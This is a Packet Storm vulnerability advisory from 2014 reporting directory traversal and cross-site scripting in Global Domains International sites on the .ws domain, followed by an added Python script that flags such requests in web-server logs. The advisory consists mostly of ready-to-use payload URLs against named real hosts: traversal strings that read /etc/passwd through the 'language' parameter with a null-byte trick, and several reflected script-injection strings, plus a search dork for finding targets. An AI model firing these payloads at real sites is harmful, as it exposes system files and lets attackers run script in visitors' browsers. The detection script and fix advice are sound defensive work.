Global Domains International Cross Site Scripting / Traversal

2014-05-07T00:00:00
ID PACKETSTORM:126545
Type packetstorm
Reporter indoushka
Modified 2014-05-07T00:00:00

Description

                                        
                                            `Global Domains International Directory traversal Vulnerability 0-Day  
====================================================================  
Author : indoushka  
vendor : http://www.nic.ws  
========================================================  
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved  
  
http://www.nic.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
https://www.website.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://www.7.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://www.movie.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://welcome-back.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
Cross site scripting (verified) :  
  
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22  
  
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11  
  
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>  
  
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>  
  
http://freedom.ws//?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E  
  
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic  
  
`
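
For defenders reviewing web-server logs, the following added example (not part of the original advisory) flags the two request patterns listed above: a `..` path segment or null byte in a query parameter, and quote or angle-bracket characters that break out of HTML context. The sample request targets are constructed for illustration, and the finding labels and function names are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request targets modelled on the patterns in the advisory;
# they are illustrative input, not captured traffic.
SAMPLES = [
    "/kvmlm2/index.dhtml?fname=&language=spanish&lname=&sponsor=gdi&template=11",
    "/kvmlm2/index.dhtml?fname=&language=../../etc/passwd%00.jpg&sponsor=gdi",
    "/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(1)%20bad%3d%22",
    "/members/?language=english'%22()%26%25<ScRiPt%20>prompt(1)</ScRiPt>",
    "/kvmlm2/index.dhtml?language=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
]

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")  # a ".." path segment
MARKUP = re.compile(r"[\"'<>]")            # characters that break out of HTML context


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def findings(request_target):
    """Return sorted (parameter, finding) pairs for one request target."""
    hits = set()
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Treat backslashes as path separators so "..\" is caught too.
        value = fully_decode(value).replace("\\", "/")
        if "\x00" in value:
            hits.add((name, "null-byte"))
        if TRAVERSAL.search(value):
            hits.add((name, "traversal"))
        if MARKUP.search(value):
            hits.add((name, "markup"))
    return sorted(hits)


if __name__ == "__main__":
    for target in SAMPLES:
        print(findings(target), target)
```

A match is a triage signal only; the durable fix is server-side, by accepting `language` only from a fixed list of known values and HTML-encoding every parameter before it is written into a page.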